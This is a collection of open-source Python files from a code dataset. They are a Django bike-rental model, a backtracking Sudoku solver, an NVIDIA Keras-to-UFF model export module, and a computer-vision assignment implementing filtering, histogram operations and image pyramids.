IntegrityError:\n # Congratulations! The 2^64 chance of uuid4 collision has happend.\n # here could be the place for the famous comment: \"should never happen\"\n # So we catch this error, but don't handle it,\n # because don't rotating a uuid every 18,446,744,073,709,551,615 rents is ok\n pass\n\n if self.bike.state == Bike.State.MISSING:\n data = {}\n if self.end_location:\n data = {\"location_id\": self.end_location.id}\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.missing_reporting\",\n data=data,\n )\n\n if self.end_station:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.station\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"station_id\": self.end_station.id,\n **({\"forced\": True} if force else {}),\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=self.bike,\n action_type=\"cykel.bike.rent.finished.freefloat\",\n data={\n \"rent_id\": self.id,\n \"trip_duration\": int(\n (self.rent_end - self.rent_start).total_seconds()\n ),\n \"location_id\": getattr(self.end_location, \"id\", None),\n **({\"forced\": True} if force else {}),\n },\n )\n\n\n@receiver(models.signals.post_save, sender=Rent)\ndef rent_started(sender, instance, created, *args, **kwargs):\n # only interested in the first save\n if not created:\n return\n if instance.start_station:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.station\",\n data={\n \"rent_id\": instance.id,\n \"station_id\": instance.start_station.id,\n },\n )\n else:\n CykelLogEntry.objects.create(\n content_object=instance.bike,\n action_type=\"cykel.bike.rent.started.freefloat\",\n data={\n \"rent_id\": instance.id,\n \"location_id\": getattr(instance.start_location, \"id\", None),\n },\n )\n","repo_name":"transportkollektiv/cykel","sub_path":"bikesharing/models/rent.py","file_name":"rent.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"53"}
+{"seq_id":"26988227943","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 11:54:26 2019\n\n@author: khushboogoyal\n\"\"\"\n\n\"\"\"this is the fucntion which check whether the board is full or not \nand return true and false, if it finds aleast one zero on the board\"\"\"\n\nimport time, os , psutil\ncount = 0\n\ndef BoradisFull(board):\n \n for x in range(0,9):\n for y in range(0,9):\n if board[x][y] == 0:\n \n return False\n \n\n print(\"board is filled\")\n \n return True\n\n \n print(\"board is yet to be solved\")\n \n\n\ndef possibleEntry(board , i, j):\n \n k=0\n l = 0\n \n \n \n \"\"\"this is the list to fill possible Array\"\"\"\n possibleArray = {}\n for x in range (1, 10):\n \n possibleArray[x] = 0\n #print('count is----',count) \n \n # for horizontal values\n for y in range (0, 9):\n \n if not board[i][y] == 0: \n \n possibleArray[board[i][y]] = 1\n \n # for vertical values\n \n for x in range (0, 9):\n if not board[x][j] == 0: \n possibleArray[board[x][j]] = 1\n \n #For squares\n\n # for i\n if i >= 0 and i <= 2:\n k = 0\n elif i >= 3 and i <= 5:\n k = 3\n else:\n k = 6\n \n # now for j\n if j >= 0 and j <= 2:\n l = 0\n elif j >= 3 and j <= 5:\n l = 3\n else:\n l = 6\n for x in range (k, k + 3):\n for y in range (l, l + 3):\n if not board[x][y] == 0:\n possibleArray[board[x][y]] = 1 \n \n for x in range (1, 10):\n if possibleArray[x] == 0:\n possibleArray[x] = x\n else:\n possibleArray[x] = 0\n \n return possibleArray\n\n\ndef printBoard(board):\n print(\"*********************\")\n for x in range(0, 9):\n if x == 3 or x == 6:\n print(\"*********************\")\n for y in range(0, 9):\n if y == 3 or y == 6:\n print(\"*\", end=\" \")\n print(board[x][y], end=\" \")\n print()\n print(\"*********************\")\n \n \ndef sudokuSolver(board):\n \n i = 0\n j = 0\n \n possiblity = {}\n global count; count += 1\n # function to check full board if in case and return board\n if BoradisFull(board):\n \n printBoard(board)\n print(\"Board Solved Successfully!\")\n \n return\n \n else:\n # check the first blank spot\n for x in range (0, 9):\n for y in range (0, 9):\n if board[x][y] == 0:\n # now i and j holds the value of x and y\n i = x\n j = y\n \n break\n else:\n continue\n break\n \n \n # get all the possibilities for i,j\n possiblity = possibleEntry(board, i, j)\n #print(possiblity)\n \n # go through all the possibilities and call the the function\n # again and again\n \n \n for x in range (1, 10):\n \n if not possiblity[x] == 0:\n board[i][j] = possiblity[x]\n \n #check again whole program\n sudokuSolver(board)\n\n \n \n \n # backtrack and it reset the particular step to 0\n board[i][j] = 0 \n \n \n \ndef main():\n \n start = time.time()\n grid=[[0 for x in range(9)]for y in range(9)] \n \n # assigning values to the grid \n #grid=[[0,0,0,0,0,9,0,0,5],\n # [0,0,9,1,0,0,0,0,7],\n # [8,0,0,0,0,3,0,0,4],\n # [9,6,0,0,0,1,8,0,0],\n # [0,0,0,0,0,0,0,0,0],\n # [0,0,2,6,0,0,0,5,1],\n #[3,0,0,9,0,0,0,0,2],\n #[1,0,0,0,0,2,3,0,0],\n #[7,0,0,4,0,0,0,0,0]]\n \n grid=[[4,0,0,0,0,5,0,0,0],\n [0,9,0,0,6,0,0,0,0],\n [6,0,0,0,2,0,4,8,0],\n [0,8,0,0,0,7,0,6,4],\n [0,5,9,0,0,0,8,3,0],\n [7,6,0,9,0,0,0,5,0],\n [0,7,5,0,4,0,0,0,8],\n [0,0,0,0,7,0,0,4,0],\n [0,0,0,1,0,0,0,0,2]]\n \n \n \n \n print(\"Board is yet to be filled\")\n printBoard(grid)\n sudokuSolver(grid)\n print('number of iterations',count)\n end = time.time()\n print(\"Time to run: {}\".format(end - start))\n \n \n \nif __name__ == \"__main__\":\n \n pid=os.getpid()\n \n ps= psutil.Process(pid)\n memoryUse = ps.memory_info()\n \n print(\"memory\", memoryUse.vms)\n main()\n\n\n\n\n\n","repo_name":"Khushgoyal/suduko_backtracking","sub_path":"backtracking_sudoku.py","file_name":"backtracking_sudoku.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20610974961","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport tempfile\n\nimport keras\nfrom nvidia_tao_tf1.core.export._quantized import (\n check_for_quantized_layers,\n process_quantized_layers,\n)\n\nfrom tensorflow.core.protobuf import saver_pb2\nfrom tensorflow.python.framework import graph_io\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.training import saver as saver_lib\nimport uff\nfrom uff.model.utils import convert_to_str\n\n\n\"\"\"Logger for UFF export APIs.\"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef _reload_model_for_inference(model, custom_objects=None):\n \"\"\"Reload a model specifically for doing inference.\n\n In order to export a model we need remove training-specific\n parts of the graph. For example, BatchNormalization layers\n may feature conditional branching to do training and inference\n alternately. This confused the UFF export tool.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to reload in inference mode.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n A model that can be used for inference only.\n \"\"\"\n # Save model to a temp file so we can reload it later.\n os_handle, tmp_model_file_name = tempfile.mkstemp(suffix=\".h5\")\n os.close(os_handle)\n model.save(tmp_model_file_name)\n\n # Make sure Keras session is clean and tuned for inference.\n keras.backend.clear_session()\n keras.backend.set_learning_phase(0)\n\n @classmethod\n def apply_fused_padding(cls, tf_node, inputs, tf_nodes):\n tf_padding = convert_to_str(tf_node.attr[\"padding\"].s)\n padding = None\n fields = {}\n if tf_padding == \"SAME\":\n fields[\"implicit_padding\"] = \"same\"\n elif tf_padding == \"VALID\":\n fields[\"implicit_padding\"] = None\n tf_lhs_node = tf_nodes[inputs[0]]\n if tf_lhs_node.op == \"Pad\":\n tf_padding_node = tf_nodes[tf_lhs_node.input[1]]\n p = cls.convert_tf2numpy_const_node(tf_padding_node)\n before, after = p[:, 0].tolist(), p[:, 1].tolist()\n if before == after:\n padding = before\n inputs[0] = tf_lhs_node.input[0]\n if tf_nodes[inputs[0]].op == \"Identity\":\n logger.info(\"Modulus patch identity layer in padding inputs.\")\n inputs[0] = tf_nodes[inputs[0]].input[0]\n else:\n raise ValueError(\"Padding mode %s not supported\" % tf_padding)\n return inputs, padding, fields\n\n def compose_call(prev_call_method):\n def call(self, inputs, training=False):\n return prev_call_method(self, inputs, training)\n\n return call\n\n def dropout_patch_call(self, inputs, training=False):\n # Just return the input tensor. Keras will map this to ``keras.backend.identity``,\n # which the TensorRT 3.0 UFF parser supports.\n return inputs\n\n # Patch BatchNormalization and Dropout call methods so they don't create\n # the training part of the graph.\n prev_batchnorm_call = keras.layers.normalization.BatchNormalization.call\n prev_dropout_call = keras.layers.Dropout.call\n\n logger.debug(\"Patching keras BatchNormalization...\")\n keras.layers.normalization.BatchNormalization.call = compose_call(\n prev_batchnorm_call\n )\n\n logger.debug(\"Patching keras Dropout...\")\n keras.layers.Dropout.call = dropout_patch_call\n\n logger.debug(\"Patching UFF TensorFlow converter apply_fused_padding...\")\n uff.converters.tensorflow.converter.TensorFlowToUFFConverter.apply_fused_padding = (\n apply_fused_padding\n )\n\n # Reload the model.\n model = keras.models.load_model(\n tmp_model_file_name, compile=False, custom_objects=custom_objects\n )\n\n # Unpatch Keras.\n logger.debug(\"Unpatching keras BatchNormalization layer...\")\n keras.layers.normalization.BatchNormalization.call = prev_batchnorm_call\n\n logger.debug(\"Unpatching keras Dropout layer...\")\n keras.layers.Dropout.call = prev_dropout_call\n\n # Delete temp file.\n os.remove(tmp_model_file_name)\n\n return model\n\n\ndef keras_to_pb(model, output_filename, output_node_names, custom_objects=None):\n \"\"\"Export a Keras model to Protobuf format.\n\n The Protobuf format is a TensorFlow-specific representation\n of the model.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If None, then the model output layers are used as output nodes.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n \"\"\"\n model = _reload_model_for_inference(model, custom_objects=custom_objects)\n\n layers_with_external_state_io = [\n layer for layer in model.layers if hasattr(layer, \"is_stateful\")\n ]\n\n def get_layer_name(layer):\n _layer_outputs = layer.get_output_at(0)\n if isinstance(_layer_outputs, list):\n return [lo.name.split(\":\")[0] for lo in _layer_outputs]\n return _layer_outputs.name.split(\":\")[0]\n\n # Get names of input and output nodes.\n in_tensors = model.inputs\n in_tensor_shape = keras.backend.int_shape(in_tensors[0])\n in_name = in_tensors[0].op.name\n\n if layers_with_external_state_io:\n in_name = [in_name]\n in_tensor_shape = [in_tensor_shape]\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n in_name.append(layer.state_input_name)\n else:\n # Add feature maps of past frames for stateless models\n in_name.extend(layer._past_feature_names)\n shape = layer.input_shape\n shape = shape if shape[0] is None or isinstance(shape[0], int) else shape[0]\n in_tensor_shape.append(shape)\n\n if output_node_names is None:\n output_node_names = [t.op.name for t in model.outputs]\n\n # Replace the sliced output node with original output layers. For example, an output node\n # named `sliced_output_cov/Sigmoid` will be replaced with `output_cov/Sigmoid`\n layer_output_names = [get_layer_name(layer) for layer in model.layers]\n original_output_names = []\n for name in output_node_names:\n # For each sliced output node, search its original node by name and use the original\n # node to replace the sliced output node.\n if name.startswith(\"sliced_output_\"):\n original_output_name_prefix = name.split(\"/\")[0][7:]\n original_output_names += [\n output_name\n for output_name in layer_output_names\n if output_name.startswith(original_output_name_prefix)\n ]\n else:\n original_output_names.append(name)\n output_node_names = original_output_names\n\n # Add output node names for the recurrent layers,\n # to handle the state external to TRT model.\n for layer in layers_with_external_state_io:\n if layer.is_stateful:\n temporal_output_node_name = get_layer_name(layer)\n else:\n temporal_output_node_name = layer.get_input_at(0).name.split(\":\")[0]\n if temporal_output_node_name not in output_node_names:\n output_node_names.append(temporal_output_node_name)\n\n # Freeze model.\n sess = keras.backend.get_session()\n\n # TensorFlow freeze_graph expects a comma separated string of output node names.\n output_node_names_tf = \",\".join(output_node_names)\n\n saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)\n\n # Save the checkpoint file to a temporary location.\n os_handle, tmp_ckpt_file_name = tempfile.mkstemp(suffix=\".ckpt\")\n os.close(os_handle)\n checkpoint_path = saver.save(sess, tmp_ckpt_file_name)\n graph_io.write_graph(sess.graph, \".\", output_filename)\n freeze_graph.freeze_graph(\n input_graph=output_filename,\n input_saver=\"\",\n input_binary=False,\n input_checkpoint=checkpoint_path,\n output_node_names=output_node_names_tf,\n restore_op_name=\"save/restore_all\",\n filename_tensor_name=\"save/Const:0\",\n output_graph=output_filename,\n clear_devices=False,\n initializer_nodes=\"\",\n )\n\n # Clean up.\n os.remove(tmp_ckpt_file_name)\n\n return in_name, output_node_names, in_tensor_shape\n\n\ndef pb_to_uff(input_filename, output_filename, out_names, text=False, quiet=True):\n \"\"\"Convert a TensorFlow model to UFF.\n\n The input model needs to be passed as a frozen Protobuf file.\n The export UFF model may be parsed and optimized by TensorRT.\n\n Args:\n input_filename (str): path to protobuf file.\n output_filename (str): file to write exported model to.\n out_names (list of str): list of the names of the output nodes.\n text (boolean): whether to save .pbtxt file.\n quiet (boolean): whether to enable quiet mode.\n \"\"\"\n uff.from_tensorflow_frozen_model(\n input_filename,\n out_names,\n output_filename=output_filename,\n text=text,\n quiet=quiet,\n )\n\n\ndef keras_to_uff(model, output_filename, output_node_names=None, custom_objects=None):\n \"\"\"Export a Keras model to UFF format.\n\n UFF stands for Universal Framework Format and is an NVIDIA\n TensorRT file format for storing a neural network's topology and\n weights.\n\n NOTE: the current Keras session is cleared in this function.\n Do not use this function during training.\n\n Args:\n model (Model): Keras model to export.\n output_filename (str): file to write exported model to.\n output_node_names (list of str): list of model output node names as\n returned by model.layers[some_idx].get_output_at(0).name.split(':')[0].\n If not provided, then the last layer is assumed to be the output node.\n custom_objects (dict): dictionary mapping names (strings) to custom\n classes or functions to be considered during deserialization for export.\n Returns:\n tuple:\n in_tensor_name(s): The name(s) of the input nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n out_tensor_name(s): The name(s) of the output nodes. If there is only one name, it will be\n returned as a single string, otherwise a list of strings.\n in_tensor_shape(s): The shape(s) of the input tensors for this network. If there is only\n one input tensor, it will be returned as a single list, otherwise\n a list>.\n\n These must be passed to the TensorRT optimization tool to identify input and output blobs.\n \"\"\"\n # First, convert model to a temporary TensorFlow Protobuf.\n if check_for_quantized_layers(model):\n calib_json = output_filename + \".json\"\n model, _ = process_quantized_layers(model, \"uff\", calib_json=calib_json)\n\n os_handle, tmp_pb_file_name = tempfile.mkstemp(suffix=\".pb\")\n os.close(os_handle)\n in_tensor_name, out_tensor_names, in_tensor_shapes = keras_to_pb(\n model, tmp_pb_file_name, output_node_names, custom_objects=custom_objects\n )\n\n # Second, convert protobuf to UFF.\n pb_to_uff(tmp_pb_file_name, output_filename, out_tensor_names)\n\n # Clean up.\n os.remove(tmp_pb_file_name)\n\n # Return a string instead of a list if there is only one output node.\n if len(out_tensor_names) == 1:\n out_tensor_names = out_tensor_names[0]\n\n return in_tensor_name, out_tensor_names, in_tensor_shapes\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/export/_uff.py","file_name":"_uff.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"7745681467","text":"import numpy as np\nfrom skimage import io\nimport os.path as osp\n\ndef load_image(file_name):\n \"\"\"\n Load image from disk\n :param file_name:\n :return: image: numpy.ndarray\n \"\"\"\n if not osp.exists(file_name):\n print('{} not exist'.format(file_name))\n return\n image = np.asarray(io.imread(file_name))\n if len(image.shape)==3 and image.shape[2]>3:\n image = image[:, :, :3]\n # print(image.shape) #should be (x, x, 3)\n return image\n\ndef save_image(image, file_name):\n \"\"\"\n Save image to disk\n :param image: numpy.ndarray\n :param file_name:\n :return:\n \"\"\"\n io.imsave(file_name,image)\n\ndef cs4243_resize(image, new_width, new_height):\n \"\"\"\n 5 points\n Implement the algorithm of nearest neighbor interpolation for image resize,\n Please round down the value to its nearest interger, \n and take care of the order of image dimension.\n :param image: ndarray\n :param new_width: int\n :param new_height: int\n :return: new_image: numpy.ndarray\n \"\"\"\n new_image = np.zeros((new_height, new_width, 3), dtype='uint8')\n if len(image.shape)==2:\n new_image = np.zeros((new_height, new_width), dtype='uint8')\n \n # ============= Your code here ============= #\n # Map each pixel in the new image with a pixel in the old image\n mapped_indices_i = np.floor(np.arange(new_height) * image.shape[0] / new_height).astype(np.int)\n mapped_indices_j = np.floor(np.arange(new_width) * image.shape[1] / new_width).astype(np.int)\n \n for i in range(new_height):\n for j in range(new_width):\n new_image[i, j] = image[mapped_indices_i[i], mapped_indices_j[j]]\n # ========================================= #\n return new_image\n\ndef cs4243_rgb2grey(image):\n \"\"\"\n 5 points\n Implement the rgb2grey function, use the\n weights for different channel: (R,G,B)=(0.299, 0.587, 0.114)\n Please scale the value to [0,1] by dividing 255\n :param image: numpy.ndarray\n :return: grey_image: numpy.ndarray\n \"\"\"\n if len(image.shape) != 3:\n print('RGB Image should have 3 channels')\n return\n \n # ============= Your code here ============= #\n # Matrix mult of image (Hi, Wi, 3) and weights (3, 1) ==> new image of (Hi, Wi, 1)\n weights = np.array([0.299, 0.587, 0.114])\n image = np.dot(image, weights)\n # ========================================= #\n\n return image/255.\n\ndef cs4243_histnorm(image, grey_level=256):\n \"\"\"\n 5 points \n Stretch the intensity value to [0, 255]\n :param image : ndarray\n :param grey_level\n :return res_image: hist-normed image\n Tips: use linear normalization here https://en.wikipedia.org/wiki/Normalization_(image_processing)\n \"\"\"\n res_image = image.copy()\n \n # ============= Your code here ============= #\n # Get global min and max intensity value\n min_level = res_image.min()\n max_level = res_image.max()\n \n # Normalizes the intensity values to [0, grey_level - 1]\n res_image = (res_image - min_level) / (max_level - min_level) * (grey_level - 1)\n # ========================================= #\n \n return res_image\n\n\n\ndef cs4243_histequ(image, grey_level=256):\n \"\"\"\n 10 points\n Apply histogram equalization to enhance the image.\n the cumulative histogram will aso be returned and used in the subsequent histogram matching function.\n :param image: numpy.ndarray(float64)\n :return: ori_hist: histogram of original image\n :return: cum_hist: cumulated hist of original image, pls normalize it with image size.\n :return: res_image: image after being applied histogram equalization.\n :return: uni_hist: histogram of the enhanced image.\n Tips: use numpy buildin funcs to ease your work on image statistics\n \"\"\"\n # ============= Your code here ============= #\n ori_hist = np.histogram(image, grey_level, (0, grey_level - 1))[0]\n cum_hist = np.cumsum(ori_hist) / (image.shape[0] * image.shape[1])\n uniform_hist = (grey_level - 1) * cum_hist\n # ========================================= #\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = image.shape\n res_image = np.zeros(image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = uniform_hist[image[i,j]]\n \n uni_hist = np.bincount(res_image.flatten(), minlength=grey_level)\n return ori_hist, cum_hist, res_image, uni_hist\n \ndef cs4243_histmatch(ori_image, refer_image):\n \"\"\"\n 10 points\n Map value according to the difference between cumulative histogram.\n Note that the cum_hists of the two images can be very different. It is possible\n that a given value cum_hist[i] != cum_hist[j] for all j in [0,255]. In this case, please\n map to the closest value instead. if there are multiple intensities meet the requirement,\n choose the smallest one.\n :param ori_image #image to be processed\n :param refer_image #image of target gray histogram \n :return: ori_hist: histogram of original image\n :return: ref_hist: histogram of reference image\n :return: res_image: image after being applied histogram matching.\n :return: res_hist: histogram of the enhanced image.\n Tips: use cs4243_histequ to help you\n \"\"\"\n \n # ============= Your code here ============= #\n def find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n\n # Get PDF, CDF for original and ref images (x_axis = intensity val, y_axis = cumulative density)\n grey_level = 256\n ori_hist, cum_hist_ori, _, _ = cs4243_histequ(ori_image, grey_level)\n ref_hist, cum_hist_ref, _, _ = cs4243_histequ(refer_image, grey_level)\n\n # Get proportion to intensity value mapping of refer image\n p2i_ref = {}\n for intensity_val, proportion in enumerate(cum_hist_ref):\n if proportion not in p2i_ref:\n p2i_ref[proportion] = intensity_val\n\n map_value = np.zeros(grey_level, dtype='uint8')\n for intensity_val, proportion in enumerate(cum_hist_ori):\n if proportion not in p2i_ref:\n # Find the nearest value if there is no exact match\n proportion = find_nearest(cum_hist_ref, proportion)\n\n map_value[intensity_val] = p2i_ref[proportion]\n # ========================================= #\n \n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist\n\n\ndef cs4243_rotate180(kernel):\n \"\"\"\n Rotate the matrix by 180. \n Can utilize build-in Funcs in numpy to ease your work\n :param kernel:\n :return:\n \"\"\"\n kernel = np.flip(np.flip(kernel, 0),1)\n return kernel\n\ndef cs4243_gaussian_kernel(ksize, sigma):\n \"\"\"\n 5 points\n Implement the simplified Gaussian kernel below:\n k(x,y)=exp(((x-x_mean)^2+(y-y_mean)^2)/(-2sigma^2))\n Make Gaussian kernel be central symmentry by moving the \n origin point of the coordinate system from the top-left\n to the center. Please round down the mean value. In this assignment,\n we define the center point (cp) of even-size kernel to be the same as that of the nearest\n (larger) odd size kernel, e.g., cp(4) to be same with cp(5).\n :param ksize: int\n :param sigma: float\n :return kernel: numpy.ndarray of shape (ksize, ksize)\n \"\"\"\n kernel = np.zeros((ksize, ksize))\n \n # ============= Your code here ============= #\n x_mean = y_mean = ksize // 2\n for i in range(ksize):\n for j in range(ksize):\n kernel[i, j] = np.exp(((i - x_mean) ** 2 + (j - y_mean) ** 2) / (-2 * (sigma ** 2)))\n # ========================================= #\n\n return kernel / kernel.sum()\n\ndef cs4243_filter(image, kernel):\n \"\"\"\n 10 points\n Implement the convolution operation in a naive 4 nested for-loops,\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return:\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n \n # Implement convolution operation using L3 slide 29\n for i in range(Hi):\n for j in range(Wi):\n x_ij = 0\n for u in range(-kernel_center_i, kernel_center_i + 1):\n for v in range(-kernel_center_j, kernel_center_j + 1):\n img_i = i - u\n img_j = j - v\n knl_i = kernel_center_i + u\n knl_j = kernel_center_j + v\n\n if img_i < 0 or img_i >= Hi or img_j < 0 or img_j >= Wi:\n continue\n\n f_uv = kernel[knl_i, knl_j]\n p_ij = image[img_i, img_j]\n x_ij += f_uv * p_ij\n\n filtered_image[i, j] = x_ij\n # ========================================= #\n\n return filtered_image\n\ndef pad_zeros(image, pad_height, pad_width):\n \"\"\"\n Pad the image with zero pixels, e.g., given matrix [[1]] with pad_height=1 and pad_width=2, obtains:\n [[0 0 0 0 0]\n [0 0 1 0 0]\n [0 0 0 0 0]]\n :param image: numpy.ndarray\n :param pad_height: int\n :param pad_width: int\n :return padded_image: numpy.ndarray\n \"\"\"\n height, width = image.shape\n new_height, new_width = height+pad_height*2, width+pad_width*2\n padded_image = np.zeros((new_height, new_width))\n padded_image[pad_height:new_height-pad_height, pad_width:new_width-pad_width] = image\n return padded_image\n\ndef cs4243_filter_fast(image, kernel):\n \"\"\"\n 10 points\n Implement a fast version of filtering algorithm.\n take advantage of matrix operation in python to replace the \n inner 2-nested for loops in filter function.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n kernel = cs4243_rotate180(kernel)\n \n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n filtered_image[i, j] = np.sum(target * kernel)\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_filter_faster(image, kernel):\n \"\"\"\n 10 points\n Implement a faster version of filtering algorithm.\n Pre-extract all the regions of kernel size,\n and obtain a matrix of shape (Hi*Wi, Hk*Wk),also reshape the flipped\n kernel to be of shape (Hk*Wk, 1), then do matrix multiplication, and rehshape back\n to get the final output image.\n :param image: numpy.ndarray\n :param kernel: numpy.ndarray\n :return filtered_image: numpy.ndarray\n Tips: You may find the functions pad_zeros() and cs4243_rotate180() useful\n \"\"\"\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n filtered_image = np.zeros((Hi, Wi))\n\n # ============= Your code here ============= #\n kernel = cs4243_rotate180(kernel).flatten()\n kernel_center_i = Hk // 2\n kernel_center_j = Wk // 2\n image = pad_zeros(image, kernel_center_i, kernel_center_j)\n \n regions = []\n for i in range(Hi):\n for j in range(Wi):\n target = image[i:i+Hk, j:j+Wk]\n regions.append(target)\n regions = np.array(regions).reshape((Hi*Wi, Hk*Wk)) \n filtered_image = np.dot(regions, kernel).reshape((Hi, Wi))\n # ========================================= #\n\n return filtered_image\n\ndef cs4243_downsample(image, ratio):\n \"\"\"\n Downsample the image to its 1/(ratio^2),which means downsample the width to 1/ratio, and the height 1/ratio.\n for example:\n A = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n B = downsample(A, 2)\n B=[[1, 3], [7, 9]]\n :param image:numpy.ndarray\n :param ratio:int\n :return:\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n return image[0:height:ratio, 0:width:ratio]\n\ndef cs4243_upsample(image, ratio):\n \"\"\"\n upsample the image to its 2^ratio, \n :param image: image to be upsampled\n :param kernel: use same kernel to get approximate value for additional pixels\n :param ratio: which means upsample the width to ratio*width, and height to ratio*height\n :return res_image: upsampled image\n \"\"\"\n width, height = image.shape[1], image.shape[0]\n new_width, new_height = width*ratio, height*ratio\n res_image = np.zeros((new_height, new_width))\n res_image[0:new_height:ratio, 0:new_width:ratio] = image\n return res_image\n\n\ndef cs4243_gauss_pyramid(image, n=3):\n \"\"\"\n 10 points\n build a Gaussian Pyramid of level n\n :param image: original grey scaled image\n :param n: level of pyramid\n :return pyramid: list, with list[0] corresponding to original image.\n\t:e.g., img0->blur&downsample->img1->blur&downsample->img2\t\n Tips: you may need to call cs4243_gaussian_kernel() and cs4243_filter_faster()\n\tThe kernel for blur is given, do not change it.\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n \n # ============= Your code here ============= #\n pyramid.append(image)\n for i in range(n):\n temp_image = cs4243_filter_faster(pyramid[i], kernel)\n temp_image = cs4243_downsample(temp_image, 2)\n pyramid.append(temp_image)\n # ========================================= #\n \n return pyramid\n\ndef cs4243_lap_pyramid(gauss_pyramid):\n \"\"\"\n 10 points\n build a Laplacian Pyramid from the corresponding Gaussian Pyramid\n :param gauss_pyramid: list, results of cs4243_gauss_pyramid\n :return lap_pyramid: list, with list[0] corresponding to image at level n-1 in Gaussian Pyramid.\n\tTips: The kernel for blurring during upsampling is given, you need to scale its value following the standard pipeline in laplacian pyramid.\n \"\"\"\n #use same Gaussian kernel \n\n kernel = cs4243_gaussian_kernel(7, 1)\n n = len(gauss_pyramid)\n lap_pyramid = [gauss_pyramid[n-1]] # the top layer is same as Gaussian Pyramid\n \n # ============= Your code here ============= #\n kernel = kernel * 4.0\n\n for i in reversed(range(n-1)):\n curr_lvl = gauss_pyramid[i+1]\n curr_lvl = cs4243_upsample(curr_lvl, 2)\n curr_lvl = cs4243_filter_faster(curr_lvl, kernel)\n\n prev_lvl = gauss_pyramid[i]\n lap_pyramid.append(prev_lvl - curr_lvl)\n # ========================================= #\n \n return lap_pyramid\n \ndef cs4243_Lap_blend(A, B, mask):\n \"\"\"\n 10 points\n blend image with Laplacian pyramid\n :param A: image on the left\n :param B: image on the right\n :param mask: mask [0, 1]\n :return blended_image: same size as input image\n Tips: use cs4243_gauss_pyramid() & cs4243_lap_pyramid() to help you\n \"\"\"\n kernel = cs4243_gaussian_kernel(7, 1)\n blended_image = None\n \n # ============= Your code here ============= #\n def reconstruct_lap_pyramid(lap_pyramid, kernel):\n # Scale kernel to compensate the 0s in the image after upsampling\n kernel = kernel * 4.0\n image = lap_pyramid[0]\n for i in range(1, len(lap_pyramid)):\n temp_image = cs4243_upsample(image, 2)\n temp_image = cs4243_filter_faster(temp_image, kernel)\n image = temp_image + lap_pyramid[i]\n return image\n \n la = cs4243_lap_pyramid(cs4243_gauss_pyramid(A))\n lb = cs4243_lap_pyramid(cs4243_gauss_pyramid(B))\n gr = list(reversed(cs4243_gauss_pyramid(mask)))\n \n lap_blended = []\n for a, b, ra in zip(la, lb, gr):\n blended = ra * a + (1.0 - ra) * b\n lap_blended.append(blended)\n\n blended_image = reconstruct_lap_pyramid(lap_blended, kernel)\n # ========================================= #\n \n return blended_image","repo_name":"alloystory/cs4243","sub_path":"Lab 